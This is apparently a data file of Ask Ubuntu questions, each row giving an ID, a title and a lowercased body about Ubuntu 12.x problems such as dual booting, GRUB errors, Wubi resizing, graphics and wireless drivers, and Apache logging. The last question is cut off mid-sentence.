256875	why does n't the standardized way to change default terminal work ?	why does n't : sudo update-alternatives -- config x-terminal-emulator work to change the default terminal in 12.10 ubuntu-one nautilus ? i find it confusing .
256878	how do i move the top bar down ?	i am using ubuntu 12.04 with unity desktop . i would like to move the top bar/panel down . how can i do that ?
256879	dual boot menu not showing after installation of ubuntu 12.04	before installing ubuntu 12.04 , windows xp with three drives were there . i 've installed ubuntu 12.04 64 bit in of the three drives which i 've mentioned above , installation went fine but after installation dual boot screen is not showing , windows is automatically loading . i 've tried answers which are found here and other ubuntu forums but non of them is worked for me . from forums what i came to know is , grub missing . to install or to repair it , i 'm unable to login to ubuntu , then how can upgrade grub in ubuntu .
256880	how do i resize an existing wubi installation ?	i have windows 7 as my default os and 500 gb hard disk . following is the partition table of my hard disk : i have installed ubuntu with `` install inside windows '' option . sda1 is the system reserved space for windows 7 sda2 is the windows partition ( c : drive ) sda3 is the partition inside which i have installed ubuntu , i.e. , it is installed in a folder called ubuntu . i also have some other files in the 200gb partiton sda4 is the common drive where i store all the stuff like music , movies , projects etc . now the problem is i have allocated only 25gb as the default installation size in wubi installer . but i want to increase the size from 25gb to 75 gb or more without losing any files neither in windows nor ubuntu . how do i do that ?
256881	how to install google earth or draftsight for 64-bit os ?	i have ubuntu 12.10 64-bit and can neither install google earth nor draftsight , because it gives me error of architecture . however , both the softwares are for 64-bit . how do i install them correctly ? original text ( portuguese ) - it was translated using google translate boa tarde : tenho o ubuntu 12.10 a 64 bytes e não consigo instalar o google hearth nem o draftsight , porque me dá erro de arquitectura . ambos os softwares são para 64 bytes . como posso instalar correctamente ? obrigado bruno
256884	tell if windows are open and not minimised from shell script unity	i 'd like to add into my .bashrc a little script that sets the terminal background to transparent iff i do n't have any non-minimised , non-terminal windows open and leaves the terminal background as image if there is something open . i 'm using 12.04 with unity . i 've no problem setting the terminal background , but i 've only got a kludge to tell if a program is open , and ca n't tell if the window is minimised . my kludge at the moment : if [ -z `` $ ( ps -e | grep firefox ) '' ] then gconftool-2 -- type string -- set /apps/gnome-terminal/profiles/default/background_type transparent else gconftool-2 -- type string -- set /apps/gnome-terminal/profiles/default/background_type image fi ( add inset for each of my most used programs ) i 'd be happy with being able to tell at launch of terminal , but if i could turn the terminal transparent upon minimising ( or closing ) the last open window , that would be amazing . i 'd guess something like : export largewindows= # number of open , non-minimised windows if [ $ largewindows -eq 0 ] then gconftool-2 -- type string -- set /apps/gnome-terminal/profiles/default/background_type transparent fi with ( somehow ) a little script that runs this upon opening , closing , minimising or un-minimising a program window . what i do n't know : how to count the number of windows ( or even running programs ) automatically . how to run a script every time i open/close/minimise/un-minimise a window . any advice in the right direction would be appreciated - thanks a lot !
256885	how to install thwab in ubuntu 12.04 ?	i want to read my .bok file from maktaba shamela in ubuntu 12.04 . i tried install it by typing : sudo add-apt-repository ppa : sabily.team/ppa sudo apt-get update and then i installed it . but then showed : e : unable locate thwab package . and i tried other way , dowloading thwab-lib_1.1.2.orig.tar.gz . but i do n't know how to install thwab-lib_1.1.2.orig.tar.gz in ubuntu . what can i do ?
256891	making wubi bigger , or upgrading to ubuntu without loosing windows ?	i have 4 hard disks . i 've got wubi installed on one , and windows installed on another . the 300gb drive for wubi/ubuntu is empty , except for wubi . i 'd like to let it take the full 300gb if it 's appropriate , not the 30gb that wubi gave it . i still need windows as software on the two `` data '' needs it and there is n't a linux alternative yet , so dual booting is still required . my drives : 1tb windows , 300gb data , 1tb data ( steam ) , 300gb wubi i 'm very new to linux , i think you may be able to blame gabe newell for this one .
256895	understanding the working of apt virtual http repository	my university has a virtual http repository which we can access by changing our proxy to 10.1.1.224:3142 . our regular proxy to access the internet is 10.1.8.44:8080 . it incredibly speeds up download speed with apt-get update and install commands . now sometimes i encounter various issues with my network connectivity when trying to use apt-get update or install with the repository , and i never know how to fix it or even try to figure out whats wrong since i have no understand of how it works . so for a networking noob , can you explain how such virtual http repository systems work ? do they have a storage of all packages ? that seems a bit impossible . or is it just sort of a gateway to access the ubuntu repositories at unrestricted speeds ? what happens if i change my repository server ( in update manager ) from say , main servers to some other server ? it still seems to work . and what happens if i add a custom ppa ? here 's a screenshot of the page that appears if i open 10.1.1.224:3142 when behind 10.1.8.44:8080 , if it helps you guys to understand what sort of proxy i 'm talking about .
256899	how safe is running wubi 's main.pyo using pyrun ?	wubi fails to run for me ( see this unresolved question ) i have found out that i get the first wubi installation screen if i run pyrun main.pyo from the % temp % \pyl**.tmp directory . if i proceed in this way what are the chances that the installation carries through ok ? or is there a point half way through the installation where it all goes horribly wrong ?
256900	blacklisted items	i have been trying to update my ubuntu but whenever i click on upgrade , my system does the usual checks and tells me it can only do a `` partial install '' which , when i accept returns this error : an unresolvable problem occurred while calculating the upgrade : the package 'unity-2d ' is marked for removal but it is in the removal blacklist . how do i resolve it ? i have rev 12.04 lts installed as requested , the output of ( 1 ) cat /etc/apt/sources.list ( 2 ) for x in /etc/apt/sources.list.d/* ; do echo ; echo ; echo `` ** $ x : '' ; echo ; cat $ x ; done ( 3 ) sudo apt-get update ( 4 ) apt-get -s upgrade and ( 5 ) apt-get -s dist-upgrade are shown in this pastebin .
256904	larger resolutions on vga monitor using gma 3150	i tried to connect a vga monitor to my netbook to increase resolution . unfortunately , in lubuntu maximum available resolution is 1024x768 , while in windows i can increase it to 1680x1050 . is there any way , e.g . alternative/older driver , to reach this ( or any bigger than 1024x768 ) resolution in lubuntu 12.10 ?
256906	error while trying to install ubuntu 12.10	i keep getting this error when i try to install ubuntu 12.10 : busyboxv1.19.3 ( ubuntu 1:1.19.3-7ubuntu ) built in shell ( ash ) enter help intramfs my computer is a pentium iii 700 mhz , with 655 mb ram . how can i install ubuntu on this computer ?
256909	auto-passphrase in schroot : ca n't connect to `/run/user/korn/keyring-x30g9r/gpg	when running `` debuild -s -sa '' to create the source files and sign them in ubuntu 12.04 i only had to enter my passphrase once and then it is automatically used to unlock my private key on future runs of the command . but on ubuntu 12.10 in a ubuntu 12.10 schroot there is this error instead : enter passphrase : ca n't connect to /run/user/korn/keyring-x30g9r/gpg ' : no such file or directory gpg : ca n't connect to/run/user/korn/keyring-x30g9r/gpg ' : connect failed i already tried to add /run in the /etc/schroot/buildd/fstab file but it did not work . this is the file : # fstab : static file system information for chroots . # note that the mount point will be prefixed by the chroot path # ( chroot_path ) # # < file system > < mount point > < type > < options > < dump > < pass > /proc /proc none rw , bind 0 0 /sys /sys none rw , bind 0 0 /dev/pts /dev/pts none rw , bind 0 0 /run /run none rw , bind 0 0 tmpfs /dev/shm tmpfs defaults 0 0 # mount a large scratch space for the build , so we do n't use up # space on an lvm snapshot of the chroot itself . /var/lib/sbuild/build /build none rw , bind 0 0
256911	how to prevent tor from starting automatically on ubuntu server ?	how do i stop tor from starting automatically on startup ? it is ubuntu server so i do n't have any gui .
256912	how do i enable wireless networking with an atheros 9485 device ?	i have an asus vivobook with windows 8 preinstalled and tried dual boot with ubuntu . i 'm new to linux and this was my first install . i installed ubuntu 12.10 but i could n't connect to wireless network . did some googling and tried some suggestions but now i do n't even have the choice to enable wireless networking . i can only connect to the internet by wired connection .
256913	how to remove ubuntu partition and boot menu ?	how do i completely remove the ubuntu partition and the boot menu so i can just keep the windows 7 partition and boot directly into it ? i want to remove it all and so i can go and reside the partition also .
256917	install iso boots but then freezes	i 've downloaded ubuntu 12.10 and put it on a usb stick using unetbootin . i successfully booted the usb , ubuntu starts and i see the classic ubutnu splash screen . then the computer freezes . disk is not reading ( as far as i can say from the disk icon ) , nothing is happening . next time i did this i pressed esc to see some output : i was wondering , maybe the disk has some problems so i tried to use `` check the disk for defects '' , but no errors found . i 've tried to burn the iso file to a cd - the same . the md5 verifies the iso file is ok . i 've even tried linux mint and i experienced exactly same problem with slighly different text messages . two notes : i 've had dualboot with windows and those are still working properly , so i do n't think this is hardware issue . i have a ext4 partition on the disk - could that interfere somehow ? i can format it , but i am lazy to do that unless necessary . dell latitude e5410 . thx for any help .
256919	ubuntu software center rendering glitch with nvidia drivers	i installed ubuntu 12.10 in my hdd , after that i had some problems because i could n't boot ubuntu and the pc booted with windows instead . ( dual boot screen didnât appear ) . i solved this through boot repair . but now my fonts on ubuntu software center are like this : from what i 've noticed , this is the only program affected . thanks .
256920	which system files are updated when you install/update/remove a package ?	when a new package is installed ( even from source ) , or existing ones are updated/deleted/purged , some system files seem to be updated . which are these ? i want the files which contain the list of these packages and their status , not the packages themselves . edit : a few of the files i came to know are /var/lib/dpkg/status and /var/lib/dpkg/status-old which get updated when you install a new package . i just want an exhaustive list of all these files .
256922	change ubuntu session from recovery mode	i installed ubuntu 12.04.2 lts yesterday and tried to change from unity2d to the default unity3d environment but my laptop got stuck only showing the default wallpaper and the mouse pointer . after 5 minutes i decided to turn off my laptop manually ( with the power button ) . now when i turn on the laptop and choose ubuntu from grub it only displays a black screen . i can now use ubuntu only in recovery mode and i want to change session from ubuntu to ubuntu 3d to see if it will help . my laptop is a hp probook with switchable graphics ( intel hd and radeon hd 6490m ) . i had a lot of trouble installing the catalyst drivers , and now i can use catalyst control center but in 'system info ' in the graphics driver section the driver is still displayed as 'unknown ' .
256926	why is n't unity loading on virtualbox ?	i also tried unity does n't load , no launcher , no dash appears , and none of the solutions worked . the virtual machine runs ubuntu 12.10 i386 and the host computer has windows 7 x64 .
256927	removing ubuntu 12.10 and back to windows 7	i just downloaded ubuntu 12.10 on my laptop that came standard with windows 7 . i figured i 'd give ubuntu a try but now i 'm finding that i prefer windows . i was unaware that i could have ubuntu as well as windows before i downloaded it and i do n't know how to revert back without a disc . would a system restore work ? i 'm sorry for my lack of knowledge about this kind of thing but i would really like to revert back . thank you .
256928	how do i change screen resolution ?	i am unable to change my screen resolution in my ubuntu 12.04 . my default screen resolution was 1366x768 . i had executed nvidia-xconfig to activate nvidia driver . since then my screen resolution has stuck on 640x480 . i have tried going to display settings , but it shows only one option in the drop down menu . xrandr -s 1366x768 is also not working . please help . thanks in advance .
256930	having access to buffered videos in ram	i read that you-tube buffered videos are the in ram while playing them and you need not download them again . just copy the flash file to another location . however , when i copied it to the home directory , it says permission denied and the file .flv on the desktop when played using vlc says vlc can not play file of format `` undf '' . what can be the problem ? here 's what i did : pgrep -f flashplayer got the pid for the video . navigated through the ram : cd /proc/pid/fd ls -l to view the number associated with the video . copied it to the home directory : cp xx /home/username/12.flv that 's all !
256945	shortcut for render latex equation in inkscape ?	i am using the render latex equation extension in inkscape . i want to add a keyboard shortcut which would bring up the extension window . any ideas ?
256947	what 's the architecture of ubuntu phone ?	will ubuntu phone be more an android or more a `` normal '' linux ? or in other words : will it be possible to have e.g . wxwidgets/wxwidgets-applications on it ?
256950	problems installing stata12 on ubuntu 12.10	i 'm trying to install stata12 on ubuntu 12.10 . i stored the directory stata12 64bit in /usr/local and then i followed this procedure : sudo apt-get install libgtksourceview-3.0-common sudo ln -s /usr/lib/libgtksourceview-2.0.so.0 /usr/lib/libgtksourceview-1.0.so.0 sudo apt-get install libgnomeprint2.2-0 cd /usr/local/stata12/ sudo chmod -r 755 . sudo sh setrwxp now sudo ./stinit after this line the terminal returns : ./stinit : 1 : ./stinit : elf : not found ./stinit : 1 : ./stinit : syntax error : unterminated quoted string ( with some strange matrix of numbers before and after elf ) any idea on this phenomenon ?
256953	how can i get the touchpad menu to show on hp dv7 ?	i 've done a clean install of 12.10 on an hp dv7 . according to xinput i do have a ps/2 synaptics touchpad . it shows ps/2 synaptics touchpad at id=11 and virtual core xtest pointer listed above it at id=4 . i ran ps aux | grep syndaemon and it shows : jason 5198 0.0 0.0 13580 888 pts/1 s+ 09:40 0:00 grep -- color=auto syndaemon i ca n't get the touchpad menu to show up and the touchpad behaves odd but it could just be me . i should note that this is a clickpad and not just a touchpad . i ran : egrep -i 'synap|alps|etps ' /proc/bus/input/devices which resulted in : n : name= '' ps/2 synaptics touchpad '' i ran : sudo apt-get install xserver-xorg-input-synaptics but it says i already have the latest/newest version . when i ran : xinput -- list-props 11 device 'ps/2 synaptics touchpad ' : device enabled ( 137 ) : 1 coordinate transformation matrix ( 139 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 258 ) : 0 device accel constant deceleration ( 259 ) : 1.000000 device accel adaptive deceleration ( 260 ) : 1.000000 device accel velocity scaling ( 261 ) : 10.000000 device product id ( 254 ) : 2 , 1 device node ( 255 ) : `` /dev/input/event10 '' evdev axis inversion ( 262 ) : 0 , 0 evdev axes swap ( 264 ) : 0 axis labels ( 265 ) : `` rel x '' ( 147 ) , `` rel y '' ( 148 ) button labels ( 266 ) : `` button left '' ( 140 ) , `` button middle '' ( 141 ) , `` button right '' ( 142 ) , `` button wheel up '' ( 143 ) , `` button wheel down '' ( 144 ) evdev middle button emulation ( 267 ) : 0 evdev middle button timeout ( 268 ) : 50 evdev third button emulation ( 269 ) : 0 evdev third button emulation timeout ( 270 ) : 1000 evdev third button emulation button ( 271 ) : 3 evdev third button emulation threshold ( 272 ) : 20 evdev wheel emulation ( 273 ) : 0 evdev wheel emulation axes ( 274 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 275 ) : 10 evdev wheel emulation timeout ( 276 ) : 200 evdev wheel emulation button ( 277 ) : 4 evdev drag lock buttons ( 278 ) : 0 i ran : cat /proc/bus/input/devices i : bus=0011 vendor=0002 product=0001 version=0000 n : name= '' ps/2 synaptics touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input10 u : uniq= h : handlers=mouse0 event10 b : prop=0 b : ev=7 b : key=70000 0 0 0 0 b : rel=3 finally i ran : cat /var/log/xorg.0.log | grep -i synaptics [ 444.143 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/event10 ) [ 444.143 ] ( ** ) ps/2 synaptics touchpad : applying inputclass `` evdev pointer catchall '' [ 444.143 ] ( ii ) using input driver 'evdev ' for 'ps/2 synaptics touchpad' [ 444.143 ] ( ** ) ps/2 synaptics touchpad : always reports core events [ 444.143 ] ( ** ) evdev : ps/2 synaptics touchpad : device : `` /dev/input/event10 '' [ 444.143 ] ( -- ) evdev : ps/2 synaptics touchpad : vendor 0x2 product 0x1 [ 444.143 ] ( -- ) evdev : ps/2 synaptics touchpad : found 3 mouse buttons [ 444.143 ] ( -- ) evdev : ps/2 synaptics touchpad : found relative axes [ 444.143 ] ( -- ) evdev : ps/2 synaptics touchpad : found x and y relative axes [ 444.143 ] ( ii ) evdev : ps/2 synaptics touchpad : configuring as mouse [ 444.143 ] ( ** ) evdev : ps/2 synaptics touchpad : yaxismapping : buttons 4 and 5 [ 444.143 ] ( ** ) evdev : ps/2 synaptics touchpad : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 444.143 ] ( ii ) xinput : adding extended input device `` ps/2 synaptics touchpad '' ( type : mouse , id 11 ) [ 444.143 ] ( ii ) evdev : ps/2 synaptics touchpad : initialized for relative axes . [ 444.143 ] ( ** ) ps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 444.143 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration profile 0 [ 444.143 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 444.143 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 444.143 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/mouse0 ) i put all this information in to a pastebin for easier reading : http : //pastebin.com/eac3bwpn
256958	i installed linux on a partition and now i do n't know how to boot it	today i installed ubuntu on to a pre-existing partition ( i also made a swap partition during the installation ) and when my machine went to restart , my screen went dark and did nothing , i did wait . there was power going to the machine . i did a forced restart but now i have no clue how to boot to the partition that i have ubuntu on . i have windows 7 , by the way . i have poked around my bios settings and i did n't see anything in the boot tab about choosing a partition to boot off of .
256961	is it possible to setup raid with mdadm before installing ubuntu	what we want is to configure our raid array before installing the os so the os will be mirrored and safe from any possible failures . is this possible . i read that a lot of people normally load the os onto a separate drive and then mount the raid array . os = ubuntu server lts 12.04
256964	how can i exit fullscreen when watching flash videos	i find that when watching a flash video in full screen , if i press esc key to exit the full screen mode , my screen turns grey and i can not do anything . ubuntu keeps running as i can still adjust the volume with the keyboard shortcut . i tried going to text mode ( ctrl+alt+fx ) and kill chrome but that did n't work . in fact i do n't know what i have to kill or disable to get the desktop back . the only solution i find is restarting lightdm which is not fun if i had some unsaved work . this happens on chrome . the plugin is shockwave flash 11.6 r602 name : shockwave flash description : shockwave flash 11.6 r602 version : 11.6.602.167 location : /opt/google/chrome/pepperflash/libpepflashplayer.so
256965	how can i get php errors reported ?	currently installed php version 5.3.10 . it is not reporting any kind of errors like syntax error e.g . < ? php define ( `` variable '' , 10 ) ; variable++ ; echo variable ; ? > this code has an error and browser should display it . but browser window is empty display error is off as i see in the information given by the phpinfo ( ) in column php core . i want it to be turned on .
256967	apache log no longer works	i saw that my /var/log/apache2/error.log log was getting very big ( runs a long time when i cat file , or open in editor ) . so i deleted it with rm . not only does it not work now , it does n't work when i recreate the file and chmod 777 . how do i reenable it ? i tried restarting apache , it gives this error : $ service apache2 restart * restarting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information .
256968	bumblebee - both graphic cards show errors while running glxspheres	so , im running ubuntu 12.04 on my acer aspire 5750g with intel hd3000 and geforce gt540m . after installing bumblebee i get : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig for glxspheres and : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig for optirun glxspheres . as im completely new to linux in general , i dont have any idea on how to solve this . cheers
256977	i am having difficulty to solve a grub problem	my laptop originally came with a windows 8 ( w8 ) already installed , but i installed the ubuntu 12.04 64bits in dual boot . to select the os was grub 2 . yesterday i was making some test with a virtual machine ( vm ) running xp and i needed increase the partition where the vm was using the gparted , but i could n't because i was the partition where is installed ubuntu , so i rebooted using w8 and used the software easeus master partition to resize my file partition , that is n't the same of ubuntu . when i tried , to reboot using ubuntu , instead appear the grub screen , appeared the message below : error : unknown filesystem grub rescue > additional informations : i am a newbie in linux . when i booted using w8 , i needed change some bios parameters , after that i finished w8 work , i returned to the same parameters to use ubuntu . i am trying use this informations to solve the problem ( https : //help.ubuntu.com/community/grub2/troubleshooting ) , but when i try use the command `` insmod '' , it shows error : invalid arch independent elf magic please , can some help me ? regards caue
256984	switching to new user limits console capabilities	i 'm creating a new user : groupadd sybase useradd -g sybase -d /opt/sybase sybase passwd sybase chown sybase : sybase /opt/sybase chown sybase : sybase /var/sybase then switch to this user : su - sybase than understand that the console-behavior is changed , tab is not working at all -for auto-completing , for example . what would be the solution for this issue ?
256986	how to achieve list/tree view in nautilus ?	how to achieve list/tree view in nautilus like the following screenshot ? cant find information about this . ps im using ubuntu remix with pure gnome 3 , and last version of nautilus .
256987	ubuntu 12.10 internal microphone does not work	i have had this issue since installing ubuntu 12.10 last week . i have read every article i could on this and nothing seems to work . i have installed pulseaudio volume control and tried every configuration in there , unlocking the channels and running a recording program to select a device in the panel.. i have tried every option in alsamixer from terminal . i have used gstreamer to try every different configuration in there . i have reinstalled 12.10 and even that did n't help . any assistance would be appreciated . computer is a compaq cq50-100ca . processor is amd athlon dual-core ql-60 ă 2 and using a proprietary graphics driver nvidia geforce 8200m g/integrated/sse2/3dnow ! and have gnome 3.6.2 installed . thanks in advance !
256992	mount error after power outage	my linux knowlege is rather limited , but i 'll try to explain . last night we had a power outage . when i restarted my server this morning i got a error message telling me that a disk failed to mount . got the option to skip mounting and continue booting . now when i try to mount the disk ( media disk , not a system disk ) i get this error : error mounting system-managed device /dev/sda2 : command-line `mount `` /mnt/sda2 '' ' exited with non-zero exit status 13 : ntfs_mst_post_read_fixup_warn : magic : 0x04e2adc6 size : 4096 usa_ofs : 16595 usa_count : 25841 : invalid argument actual vcn ( 0x103f339f56a78da1 ) of index buffer is different from expected vcn ( 0x3 ) . failed to mount '/dev/sda2 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . ( udisks-error-quark ) is there anyone that can give me some assistance . would hate loosing 2 gb of my media files .
256995	ubuntu 12.04.2 wo n't boot after bumblebee instalation	first of all sorry for my english , it 's not my first language . here is what i have done : i had a working ubuntu 12.04 with all updates and working bumblebee , so i could do optirun command and battery life was better than without bumblebee . than i decided to reinstall both my systems installed windows 7 and ubuntu . reinstalled windows 7 all working as expected , than on other partition installed ubuntu 12.04 . all worked perfectly . than i installed bumblebee according to the procedure written here https : //wiki.ubuntu.com/bumblebee same steps that i used before . but now after i install drivers and do all written in procedure and i reboot my notebook system wo n't boot , it is simply stuck at black screen after short showing of start screen . i reinstalled ubuntu many times already and tried everthing , but when i try install nvidia drivers it wo n't boot after shutting down notebook and only thing i can do is reinstalling system . i have lenovo thinkpad edge e530 and processor : intelâž coreâ˘ i5-3210m cpu and graphic cards are intel hd 4000 and nvidia geforce gt630m after clean install without bumblebee , terminal command lspci| grep vga is showing : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0de9 ( rev a1 ) can you suggest a sollution ? ? or at least some links to similar topics ? ?
256998	how do i create a shortcut and place on the desktop ?	i would like to create a shortcut which will cd to a particular directory and then execute a .sh file , thereby opening my application . at the moment i enter the following into the terminal : cd /opt/intel/vtune_amplifier_xe_2013 then source amplxe-vars.sh and amplxe-gui so i create an executable file on the desktop which has : source /opt/intel/vtune_amplifier_xe_2013/amplxe-vars.sh amplxe-gui and set it 's properties to be executable . however , when i double click and choose run or run in terminal , it doesnt open the application . however the exact same commands work in terminal ?
257002	transfer installed application/program via pendrive	i have about 25 to 30 computer on which its required to install several applications/programs ( like dosbox , mysql , netbeans etc ) . my problem is that i have internet connection on only one pc . is there any way i can download the program on only one pc and saperately install it one-by-one on other pc 's via pendrive or dvd 's ?
257006	usb fan controller	i 'd like to control the speed of 3 fans : cpu fan ( 3-pin fan connector ; connected to mainboard ) 2x chassis fan ( 3-pin fan connector ; connected to power supply via molex adapter ) unfortunately , it seems that my mainboard ( intel dg45fc ) does n't allow to control the cpu fan : `` sudo pwmconfig '' gives `` there are no pwm-capable sensor modules installed '' . lspci output : http : //pastie.org/6197353 is there a usb fan controller ( for sale , no diy ) , which lets ubuntu control three or more 3-pin fans ?
257007	wubi-installed ubuntu 12.10 boots to purple screen	today i installed ubuntu for the first time using the wubi installer , everything went well until i tried to boot . i turned off the pc , turned it back on , chose ubuntu as the os to boot , and then i just get a purple screen . i 've waited for a while but nothing happens , i do n't get any logo or anything , it 's just a blank , purple screen . i 've tried to boot it multiple times , i always get the same result . just before the screen appears , i manage to glimpse some console message about `` no wubildr '' , but a file with that name is on the root drive where ubuntu is installed . i looked around on the net for a solution but nothing seemed to address my problem . i tried to set nomodeset as outlined here ( specifically following the instructions of method 2 in post # 8 ) , but it does n't seem to have any effect at all . here are my system specs : windows 7 ultimate 64-bit amd turion ii p520 dual-core processor ~2.3ghz 4gb ram ati mobility radeon hd 5650 by the way , i installed ubuntu on my d drive , which is a separate partition of c ( where windows is installed ) , although they are both the same physical drive . i did n't partition specifically for ubuntu though , it 's been there for ages . so yeah , anyone know what the problem is and how to fix it ?
257009	xfce windows are missing toolbar , focus is broken	it 's subtle , but as you can see in the screenshot : there are no min , max or close buttons on the windows . the edges of windows can be resized , but it does n't help the situation . clicking on a window behind another window does n't bring the background window to the foreground . there 's no way to `` focus '' on a particular window . the alt-tab shortcut to cycle between windows is non-responsive . also , some menus seem to be missing some options . in the pan newsreader , when composing a message , there 's no option to paste text anymore . it almost seems as though a piece of the window manager is missing . i 'm running on old hardware , and only have xfce installed , ca n't support much more . everything was fine last night until logging out , but this is now persisting as a problem . i will look at x logs , but right now have now way of copy/pasting them to this question , so i 'll edit that in later as i figure out how to work around not being able to copy/paste between applications .
257011	i cant get the internet to run ( linksys ae2500 )	i have a wireless linksys ae2500 network adapter to connect to the internet but when i boot ubuntu there is no internet connection . what do i do now ? ?
257012	changed ownership of sudo and now i need to save files from the computer to reinstall	i was a newb and chown 'd the usr/bin folder . i 'm going to reinstall but i 'd really like to be able to save a tarball i created of all the important files ( passwords and such ) . however ubuntu refuses to connect to the internet or recognize usb drives and cds . alt+f2 freezes the system and i end up having to restart . the errors i get when i attempt such tasks are simply `` permission denied . ''
257013	why ca n't i access webmin since installing dansguardian and squid ?	i installed webmin and it was working great until i installed dansguardian & squid and then webmin stopped , if i try to log into webmin this is what am getting on firefox . the proxy server is refusing connections firefox is configured to use a proxy server that is refusing connections
257016	silhouette cameo installation/run help	i 'm attempting to install and run the silhouette studio through wine . everything goes fine until i crank up the studio- it gets stuck on `` initializing ... '' has anyone tried/use the silhouette with ubuntu ?
257017	cant get any internet on ubuntu 12.10 ! !	so i went into ubuntu and did the lspci command in terminal . results were '' broadcom bcm4318 802.11 b/g wireless network adapter . now what do i do ? it wont even search for the internet .
257018	ubuntu 12.04 - run a few command lines at every startup	i was wondering if there is any way that i can run certain command lines through the terminal automatically at every start up of the computer . i have a wacom tablet and it is quite annoying to turn the desire settings every time the system is restarted . for example , i want the following lines to run automatically : xsetwacom -- set `` wacom bamboo 16fg 4x5 finger touch '' touch off xsetwacom -- set `` wacom bamboo 16fg 4x5 finger pad '' button 1 `` key up '' xsetwacom -- set `` wacom bamboo 16fg 4x5 finger pad '' button 3 `` key down '' is it possible to run it automatically at every startup ?
257021	command which takes in password as argument ?	is there any bash command or technique through which we can enter in password alongwith the command which requires the password of superuser ? for e.g sudo apt-get install kde < password > i am actually using it to pass it in a c program which takes in bash command and prints out the output .
257022	mac-restored ipod is mounted as read-only	i restored my ipod on a friend 's mac using itunes . when plugging in my ipod now , it 's mounted as read-only and i have no way to transfer songs ( using rhythmbox or nautilus ) . i 've tried changing the permissions by hand but no luck . information on the internet is outdated and does not apply to my ipod classic 6th generation .
257023	ubuntu random freeze and then restart	i 'm on the verge of throwing my computer out my window . ubuntu keeps randomly freezing and restarting itself . when it freezes , i ca n't move the mouse and it wo n't respond to any keyboard input . however , if i spam a lot of keys , it does n't restart , it just stays stuck . it wo n't respond to reisub either . i ca n't find any correlation to what i 'm doing and why it 's restarting . i did n't notice anything that struck me in the logs . if you 'd like me to post a specific log , please let me know . i suspect it may be over heating but whenever i monitor the temps via monitors and via nvidia they do n't spike or increase more than five degrees . the only programs i have install are relating to ruby on rails / sublime text / chrome . i reinstalled everything , and noticed no problems . i left my computer running for four or so hours and it stayed on . then i went through and finished ror , it all ran . i added guard and zeus . then about 20 minutes after that it restarted . i think this was random again ? or at least i could n't find a reason why zeus / guard would cause a restart ? ubuntu : 12.04 rails : 3.2.11 ruby : 1.9.3 graphics : gts 450 ( nvidia ) intel® core™2 quad cpu @ 2.40ghz × 4 memory : 2gb os : 32 bit space : 30gb nvidia driver version : 295.40 in order to get rails working , i did follow this thread : rails typhoeus curl trouble i 've read through this thread but it does n't produce a viable solution : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/993187 suggestions ? ideas ? sympathy or pity ?
257025	team fortress 2 black screen	when i launch tf2 through steam all i see is a black screen . i am running 12.04 on an ibm thinkpad t42 . i have already tried adding export lang=c export lc_numeric=posix export force_s3tc_enable=true to /usr/bin/steam . i am in windowed mode , i had the same problems when i was in full-screen . here are the start up options i had on tf2 -window -dxlevel 85 -console -nojoy output of lspci , this is the the full output just the output about graphics card 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv200 [ mobility radeon 7500 ] when i go to dash -- - > details it says my graphics are r100 ( rv200 4c57 ) x86/mmx/sse2 tcl dri2 here is a question about installing drivers for my graphics card . how do i install the drivers for my mobility radeon ati card ?
257031	why do i get `` exceeds msdos-partition-table-imposed maximum '' ?	i seem to be having this odd issue with ubuntu that i had in a previous attempt at installing and have still not been able to successfully install ubuntu on any of my computers . this most recent attempt at installing stops at the installation type screen where i inform it to dualboot with my windows 7 64 bit os . when i clicked install now , i receive an error stating : starting sector number , 4294967296 exceeds the msdos-partition-table-imposed maximum of 4294967295 with this error i can not click the ok button to remove the error as it stays there and it does n't seem to be frozen as i can see the lighting on the button light up when i mouse over the selection but it will not continue . i have heard this error occurs from 3tb hard drives ( which i have ) not working properly with ubuntu . however , when i encountered this error before i somehow got around it and ended up with 2tb on my normal c : drive and 700~gb on a new partition like drive . i do n't remember doing anything to spur this on but i only assume it was during my troubleshooting of the situation last time and it ended up causing it to split up that 700~gb to another drive . also a small question about that , does ubuntu do that or do i need to do it because ubuntu can not handle 3tb hard drives and has to force the hard drive to turn into around 2tb where it can easily work with it ? i did n't exactly know why it needed it and if it maybe 